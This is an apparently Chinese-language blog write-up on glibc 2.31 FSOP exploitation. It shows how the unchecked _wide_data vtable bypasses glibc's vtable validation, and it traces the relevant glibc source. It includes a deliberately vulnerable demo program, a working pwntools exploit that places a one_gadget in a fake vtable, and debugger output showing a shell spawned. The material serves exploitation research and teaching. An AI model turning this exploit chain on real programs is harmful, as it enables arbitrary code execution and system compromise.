Exploiting FSOP with _wide_data
前言
眾所周知,glibc在2.24引入vtable檢查,使針對vtable的攻擊手段如FSOP, House of Orange等攻擊手法失效,不過很快有一條新的利用鏈被發現,就是FILE成員中的
_wide_data段,在glibc執行_wide_data上vtable的函式時,並不會進行vtable進行檢查,因此衍生出如House of Apple等可以在高版本(>=2.35)通殺的利用手段.
本文主要探討在glibc 2.31環境下利用_wide_data進行vtable劫持,以達成control flow
FILE結構分析
所有的原始碼皆取自 glibc source browser : Glibc 2.31 Source code
當在C語言進行如 FILE *fp=fopen(...) 或是使用stdin/stdout/stderr時,glibc都是使用以下結構:
struct _IO_FILE_plus{ FILE file; const struct _IO_jump_t *vtable;};其中FILE在內部的實作如下:
struct _IO_FILE_complete{ struct _IO_FILE _file;#endif __off64_t _offset; /* Wide character stream stuff. */ struct _IO_codecvt *_codecvt; struct _IO_wide_data *_wide_data; struct _IO_FILE *_freeres_list; void *_freeres_buf; size_t __pad5; int _mode; /* Make sure we don't get into trouble again. */ char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)]; // 你可以把它當作padding};其中可以看到除了描述FILE結構相關的_file之外,還有許多用來描述Wide character的相關member, 其中可以看到*_wide_data,追進去看一下相關定義:
struct _IO_wide_data{ wchar_t *_IO_read_ptr; /* Current read pointer */ wchar_t *_IO_read_end; /* End of get area. */ wchar_t *_IO_read_base; /* Start of putback+get area. */ wchar_t *_IO_write_base; /* Start of put area. */ wchar_t *_IO_write_ptr; /* Current put pointer. */ wchar_t *_IO_write_end; /* End of put area. */ wchar_t *_IO_buf_base; /* Start of reserve area. */ wchar_t *_IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */ wchar_t *_IO_backup_base; /* Pointer to first valid character of backup area */ wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */
__mbstate_t _IO_state; __mbstate_t _IO_last_state; struct _IO_codecvt _codecvt;
wchar_t _shortbuf[1];
const struct _IO_jump_t *_wide_vtable;};可以看到在裡面又有一個vtable, 跟前面的_IO_FILE_plus一樣是使用_IO_jump_t做宣告,接著來看vtable的成員是怎麼被呼叫的
標準IO呼叫流程
這邊以printf為例
printf
首先當呼叫printf時,glibc會把printf的參數再丟到__printf_chk裡面做進一步的處理,有點類似__libc_malloc與_int_malloc的概念:
__fortify_function intprintf (const char *__restrict __fmt, ...){ return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());}然後我們可以一直往裡面追進去(中間的過程太繁瑣就不列出),可以發現他是遵循以下流程:
- printf() - __printf_chk() - __vfprintf_internal()其中__vfprintf_internal其實是一個alias:
# define vfprintf __vfprintf_internal仔細看vfprintf的source code,可以看到
剛開始有對於Wide char的檢查,實際上就是去看FILE結構裡面_mode這個成員:
// vfprintf#ifdef ORIENT /* Check for correct orientation. */ if (_IO_vtable_offset (s) == 0 && _IO_fwide (s, sizeof (CHAR_T) == 1 ? -1 : 1) != (sizeof (CHAR_T) == 1 ? -1 : 1)) /* The stream is already oriented otherwise. */ return EOF;#endif
// _IO_fwide#define _IO_fwide(__fp, __mode) \ ({ int __result = (__mode); \ if (__result < 0 && ! _IO_fwide_maybe_incompatible) \ { \ if ((__fp)->_mode == 0) \ /* We know that all we have to do is to set the flag. */ \ (__fp)->_mode = -1; \ __result = (__fp)->_mode; \ } \ else if (__builtin_constant_p (__mode) && (__mode) == 0) \ __result = _IO_fwide_maybe_incompatible ? -1 : (__fp)->_mode; \ else \ __result = _IO_fwide (__fp, __result); \ __result; })接下來做一個對於buffer的檢查,然後就是一連串對於format string的處理,不過不在討論範疇,感興趣的是他如何去做高階IO,可以在接近結尾的地方看到:
done = printf_positional (s, format, readonly_format, ap, &ap_save, done, nspecs_done, lead_str_end, work_buffer, save_errno, grouping, thousands_sep, mode_flags);追進去printf_positional可以看到關於輸出的部分都是使用一個叫做outstring的macro:
/* Write the following constant string. */ outstring (specs[nspecs_done].end_of_fmt, specs[nspecs_done].next_fmt - specs[nspecs_done].end_of_fmt);然後可以來看outstring這個macro:
#define outstring(String, Len) \ do \ { \ assert ((size_t) done <= (size_t) INT_MAX); \ if ((size_t) PUT (s, (String), (Len)) != (size_t) (Len)) \ { \ done = -1; \ goto all_done; \ } \ if (__glibc_unlikely (INT_MAX - done < (Len))) \ { \ done = -1; \ __set_errno (EOVERFLOW); \ goto all_done; \ } \ done += (Len); \ } \ while (0)他實際上是用PUT去做輸出,查看定義可以看到是使用vtable裡面的函數:
# define PUT(F, S, N) _IO_sputn ((F), (S), (N))接著可以看對於_IO_sputn的相關定義,總之可以一直追到vtable的跳轉部分:
#define _IO_sputn(__fp, __s, __n) _IO_XSPUTN (__fp, __s, __n)#define _IO_XSPUTN(FP, DATA, N) JUMP2 (__xsputn, FP, DATA, N)#define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
# define _IO_JUMPS_FUNC(THIS) \ (IO_validate_vtable \ (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \ + (THIS)->_vtable_offset)))最終在使用vtable上的函數之前,會有一個關於vtable的檢查,該檢查相當簡單,去檢查vtable是否位在glibc上的vtable segment:
IO_validate_vtable (const struct _IO_jump_t *vtable){ /* Fast path: The vtable pointer is within the __libc_IO_vtables section. */ uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables; uintptr_t ptr = (uintptr_t) vtable; uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables; if (__glibc_unlikely (offset >= section_length)) /* The vtable pointer is not in the expected section. Use the slow path, which will terminate the process if necessary. */ _IO_vtable_check (); return vtable;}否則會檢查vtable裡面的所有member:
void attribute_hidden_IO_vtable_check (void){#ifdef SHARED /* Honor the compatibility flag. */ void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables);#ifdef PTR_DEMANGLE PTR_DEMANGLE (flag);#endif if (flag == &_IO_vtable_check) return;
/* In case this libc copy is in a non-default namespace, we always need to accept foreign vtables because there is always a possibility that FILE * objects are passed across the linking boundary. */ { Dl_info di; struct link_map *l; if (!rtld_active () || (_dl_addr (_IO_vtable_check, &di, &l, NULL) != 0 && l->l_ns != LM_ID_BASE)) return; }
#else /* !SHARED */ /* We cannot perform vtable validation in the static dlopen case because FILE * handles might be passed back and forth across the boundary. Therefore, we disable checking in this case. */ if (__dlopen != NULL) return;#endif
__libc_fatal ("Fatal error: glibc detected an invalid stdio handle\n");}_IO_XSPUTN
前面講到printf最後是去呼叫到vtable裡面的_IO_XSPUTN成員,有以下定義:
size_t_IO_new_file_xsputn (FILE *f, const void *data, size_t n){ const char *s = (const char *) data; size_t to_do = n; int must_flush = 0; size_t count = 0;
if (n <= 0) return 0; /* This is an optimized implementation. If the amount to be written straddles a block boundary (or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */ if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING)) { count = f->_IO_buf_end - f->_IO_write_ptr; if (count >= n) { const char *p; for (p = s + n; p > s; ) { if (*--p == '\n') { count = p - s + 1; must_flush = 1; break; } } } } else if (f->_IO_write_end > f->_IO_write_ptr) count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
/* Then fill the buffer. */ if (count > 0) { if (count > to_do) count = to_do; f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count); s += count; to_do -= count; } if (to_do + must_flush > 0) { size_t block_size, do_write; /* Next flush the (full) buffer. */ if (_IO_OVERFLOW (f, EOF) == EOF) /* If nothing else has to be written we must not signal the caller that everything has been written. */ return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */ block_size = f->_IO_buf_end - f->_IO_buf_base; do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write) { count = new_do_write (f, s, do_write); to_do -= count; if (count < do_write) return n - to_do; }
/* Now write out the remainder. Normally, this will fit in the buffer, but it's somewhat messier for line-buffered files, so we let _IO_default_xsputn handle the general case. */ if (to_do) to_do -= _IO_default_xsputn (f, s+do_write, to_do); } return n - to_do;}可以看到他使用_IO_OVERFLOW macro去刷新buffer,這邊會需要通過vtable驗證:
#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
#define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
# define _IO_JUMPS_FUNC(THIS) \ (IO_validate_vtable \ (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \ + (THIS)->_vtable_offset)))不過在初步追蹤的時候_IO_OVERFLOW下方可以看到_IO_WOVERFLOW的定義:
#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
#define _IO_WIDE_JUMPS(THIS) \ _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable追蹤到呼叫vtable的地方,可以發現完全沒有任何檢查,直接去存取_wide_vtable
Bypass Vtable checks
從以上可以發現,FILE結構雖然有對vtable位置的驗證,但是在做寬字元處理時,不知道出於什麼原因,glibc不會對wide_data中的vtable做驗證
因此若可以構造_wide_data指向一個我們可控制的區域,那就有機會像glibc 2.23那樣利用一次寫Heap地址(例如largebin attack)去構造一個fake FILE達成FSOP
FSOP
Without vtable validation
在沒有進行vtable驗證的低版本,可以透過以下調用鏈進行利用:
- exit - _IO_cleanup - _IO_flush_all_lockp其中_IO_flush_all_lockp會對每個FILE結構檢查buffer裡面是否還有內容,若有則呼叫overflow,這時候如果把vtable改成一個可控地址,並在上面寫上One gadget就可以控制流程
不過glibc 2.23 (Ubuntu 16.04)真的非常古老,基本上都不會看到,但我們還是可以利用_wide_data去進行FSOP
With vtable validation
前面提到的調用鏈是讓_IO_flush_all_lockp裡面的overflow去觸發fake vtable裡面的one gadget,不過由於vtable validation的存在,走這條路似乎不太可行
不過_IO_cleanup裡面並不是只有這邊才會去呼叫vtable,稍微看一下可以發現呼叫完之後又去呼叫_IO_unbuffer_all:
static void_IO_unbuffer_all (void){ FILE *fp;
#ifdef _IO_MTSAFE_IO _IO_cleanup_region_start_noarg (flush_cleanup); _IO_lock_lock (list_all_lock);#endif
for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain) { int legacy = 0;
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) if (__glibc_unlikely (_IO_vtable_offset (fp) != 0)) legacy = 1;#endif
if (! (fp->_flags & _IO_UNBUFFERED) /* Iff stream is un-orientated, it wasn't used. */ && (legacy || fp->_mode != 0)) {#ifdef _IO_MTSAFE_IO int cnt;#define MAXTRIES 2 for (cnt = 0; cnt < MAXTRIES; ++cnt) if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0) break; else /* Give the other thread time to finish up its use of the stream. */ __sched_yield ();#endif
if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF)) { fp->_flags |= _IO_USER_BUF;
fp->_freeres_list = freeres_list; freeres_list = fp; fp->_freeres_buf = fp->_IO_buf_base; }
_IO_SETBUF (fp, NULL, 0);
if (! legacy && fp->_mode > 0) _IO_wsetb (fp, NULL, NULL, 0);
#ifdef _IO_MTSAFE_IO if (cnt < MAXTRIES && fp->_lock != NULL) _IO_lock_unlock (*fp->_lock);#endif }
/* Make sure that never again the wide char functions can be used. */ if (! legacy) fp->_mode = -1; }
#ifdef _IO_MTSAFE_IO _IO_lock_unlock (list_all_lock); _IO_cleanup_region_end (0);#endif}仔細看他在_IO_list_all的迭代流程,會呼叫_IO_SETBUF,這是一個vtable裡面的member.
從前面的分析可以發現,glibc在對vtable做完驗證之後呼叫的方式是把該地址加上一個固定的offset之後呼叫他,且vtable驗證是去檢查是否存在glibc的vtable segment.
在該區段上存放非常多vtable,若我們可以利用錯位的方式偽造vtable,就可讓原本要正常呼叫_IO_SETBUF去呼叫到其他member, 甚至去呼叫其他vtable裡面的member
可以先看一下正常的FILE結構,他的vtable是長這樣的:
pwndbg> p _IO_file_jumps$13 = { __dummy = 0, __dummy2 = 0, __finish = 0x7f4535b96f50 <_IO_new_file_finish>, __overflow = 0x7f4535b97d80 <_IO_new_file_overflow>, __underflow = 0x7f4535b97a20 <_IO_new_file_underflow>, __uflow = 0x7f4535b98f50 <__GI__IO_default_uflow>, __pbackfail = 0x7f4535b9a680 <__GI__IO_default_pbackfail>, __xsputn = 0x7f4535b965d0 <_IO_new_file_xsputn>, __xsgetn = 0x7f4535b96240 <__GI__IO_file_xsgetn>, __seekoff = 0x7f4535b95860 <_IO_new_file_seekoff>, __seekpos = 0x7f4535b99600 <_IO_default_seekpos>, __setbuf = 0x7f4535b95530 <_IO_new_file_setbuf>, __sync = 0x7f4535b953c0 <_IO_new_file_sync>, __doallocate = 0x7f4535b88c70 <__GI__IO_file_doallocate>, __read = 0x7f4535b965a0 <__GI__IO_file_read>, __write = 0x7f4535b95e60 <_IO_new_file_write>, __seek = 0x7f4535b95600 <__GI__IO_file_seek>, __close = 0x7f4535b95520 <__GI__IO_file_close>, __stat = 0x7f4535b95e40 <__GI__IO_file_stat>, __showmanyc = 0x7f4535b9a810 <_IO_default_showmanyc>, __imbue = 0x7f4535b9a820 <_IO_default_imbue>}既然知道可以透過偽造vtable去讓_IO_SETBUF呼叫到其他member,那肯定是要讓這個被呼叫的函數能夠做_wide_data的處理,因為我們能夠偽造_wide_data裡面的vtable,
不過問題是怎麼做呢? 其實有很多條調用鏈,因為所有跟wide char有關的處理函數都沒有套用vtable驗證,這邊挑一個比較簡單的_IO_wfile_underflow來講.
首先稍微trace一下_IO_wfile_underflow, 並找到第一個呼叫vtable的部分:
wint_t_IO_wfile_underflow (FILE *fp){ struct _IO_codecvt *cd; enum __codecvt_result status; ssize_t count; // ... if (fp->_wide_data->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_wide_data->_IO_save_base != NULL) { free (fp->_wide_data->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_wdoallocbuf (fp); } // ... return *fp->_wide_data->_IO_read_ptr;}可以看到,如果_wide_data裡面的_IO_buf_base為null, 他會去呼叫_IO_wdoallocbuf:
void_IO_wdoallocbuf (FILE *fp){ if (fp->_wide_data->_IO_buf_base) return; if (!(fp->_flags & _IO_UNBUFFERED)) if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) return; _IO_wsetb (fp, fp->_wide_data->_shortbuf, fp->_wide_data->_shortbuf + 1, 0);}
#define _IO_WDOALLOCATE(FP) WJUMP0 (__doallocate, FP)可以看到他使用_IO_WDOALLOCATE這個macro去呼叫vtable裡面的__doallocate,也就是不會通過vtable檢查!
因此我們如果有辦法觸發這個_IO_WDOALLOCATE,就有辦法透過偽造出來的vtable去control flow :
- _IO_wfile_underflow - _IO_wdoallocbuf - _IO_WDOALLOCATE - __doallocateTriggering fake vtable
透過以上的分析,可以發現我們若要使用FSOP進行利用,需要滿足以下條件:
程式從main return / 觸發abort / 呼叫exit
除此之外,還有一些檢查必須繞過,才能讓glibc最終呼叫到我們偽造的vtable(上面的__doallocate)
首先是進入_IO_wfile_underflow前,我們需要通過以下調用鏈:
- exit - _IO_cleanup - _IO_unbuffer_all首先是在_IO_cleanup在呼叫_IO_unbuffer_all前,會先呼叫_IO_flush_all_lockp,其中有以下對於刷新buffer的檢查:
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) || (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)) ) && _IO_OVERFLOW (fp, EOF) == EOF)我們不希望踩進去_IO_OVERFLOW造成不必要的麻煩,因此fp裡面的_mode設成1, fp->_wide_data->_IO_write_ptr與fp->_wide_data->_IO_write_base皆設成NULL
接下來就會進到_IO_unbuffer_all,透過以下流程就可以control flow:
- _IO_SETBUF (偽造成_IO_wfile_underflow) - _IO_wdoallocbuf - _IO_WDOALLOCATE - __doallocate接下來我們關心的是如何透過偽造vtable地址讓_IO_SETBUF變成_IO_wfile_underflow,那可以先看一下_IO_SETBUF的offset:
pwndbg> p &_IO_file_jumps.__setbuf$18 = (_IO_setbuf_t *) 0x7feb2d9544f8 <_IO_file_jumps+88>可以發現他在_IO_file_jumps+0x58處,再看一下_IO_wfile_underflow:
pwndbg> p &_IO_wfile_jumps.__underflow$20 = (_IO_underflow_t *) 0x7feb2d953f80 <_IO_wfile_jumps+32>發現他在_IO_wfile_jumps+0x20處,因此我們可以偽造vtable,讓他指向_IO_wfile_jumps-0x38,那當glibc呼叫_IO_SETBUF這個macro時,
就會去存取_IO_wfile_jumps-0x38+0x58, 也就是_IO_wfile_jumps+0x20,就成功讓glibc進入處理wide char的函數了
偽造完fp,接著來看如何去構造_wide_data,分析一下呼叫vtable之前會做什麼判斷:
if (fp->_wide_data->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_wide_data->_IO_save_base != NULL) { free (fp->_wide_data->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_wdoallocbuf (fp); }可以看到假如wide_data->_IO_buf_base為NULL就會踩進來,並且我們需要規避上面的free,但也非常簡單,只需要把_wide_data->_IO_save_base設成NULL,就可以繞過,並最終去觸發__doallocate
Exploit
綜合以上所述,我們可以構造FILE結構如下:
_mode: 1 (1代表正在使用wide char)_wide_data: 指向偽造的_wide_datavtable:_IO_wfile_jumps-0x38
並偽造以下_wide_data:
vtable: 指向偽造的vtable
接著在vtable的__doallocate上放上想執行的位置,就能control flow了,以下隨便寫一個小程式demo一下偽造的過程:
vuln.c :
#include <stdio.h>#include <stdlib.h>#include <unistd.h>
char buf[512];FILE *fp;
int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); fp = tmpfile(); printf("%p\n", stderr); printf("fs: "); read(0, (void*)fp, 225); printf("buf: "); read(0, buf, sizeof(buf)); exit(0);}關於__doallocate,可以在_IO_wfile_jumps+0x68找到他:
pwndbg> p &_IO_wfile_jumps.__doallocate$21 = (_IO_doallocate_t *) 0x7feb2d953fc8 <_IO_wfile_jumps+104>pwndbg>exploit:
#!/usr/bin/env python3from pwn import *context.binary = "a.out"e = context.binaryl = ELF("/lib/x86_64-linux-gnu/libc.so.6")r = process(e.path)
stderr = int(r.recvline().strip(), 16)l.address = stderr-l.sym._IO_2_1_stderr_success("libc : %s" % hex(l.address))
p = flat( { 0xc0 : 1, 0xa0 : e.sym.buf, # _wide_data 0xd8 : l.sym._IO_wfile_jumps-0x38 # vtable }, filler = b"\0")r.sendlineafter(":", p)
p = flat( { 0xe0 : e.sym.buf+256, # fake_vtable 0x168 : l.address+0xe3b04 # fake_vtable+0x68 }, filler = b"\0")pause()r.sendlineafter(":", p)
r.interactive()我們把fake_vtable+0x68處放上one_gadget,也就是讓doallocate開個shell出來:
pwndbg> atAttaching to a.out ...
Program stopped.0x00007f5f9b990fd2 in __GI___libc_read (fd=0, buf=0x4040c0 <buf>, nbytes=512) at ../sysdeps/unix/sysv/linux/read.c:2626 ../sysdeps/unix/sysv/linux/read.c: No such file or directory.pwndbg> cContinuing.process 276 is executing new program: /usr/bin/dash成功get shell
Refs
其中Roderick為House of Apple發明者